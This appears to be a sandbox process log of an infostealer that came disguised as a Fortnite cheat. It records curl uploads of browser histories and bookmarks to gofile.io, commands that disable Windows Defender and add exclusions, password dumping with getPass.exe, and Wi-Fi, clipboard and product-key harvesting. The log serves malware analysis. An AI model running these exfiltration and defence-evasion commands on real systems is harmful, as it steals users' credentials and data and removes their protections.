C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5484 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Fortnite-external-updated-main\Fortnite-external-updated-main\VANTA.rar"
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:8
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\vt.exe'
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\getPass'
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\where.exe
where /r . *.sqlite
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Local\Temp\_MEI42562\getPass.exe
getPass.exe /stext pass.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"
C:\Windows\system32\net.exe
net session
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\vt.exe'
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\getPass'
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\system32\where.exe
where /r . *.sqlite
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
C:\Users\Admin\AppData\Local\Temp\_MEI55522\getPass.exe
getPass.exe /stext pass.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"
C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"
C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe"
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\vt.exe'
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
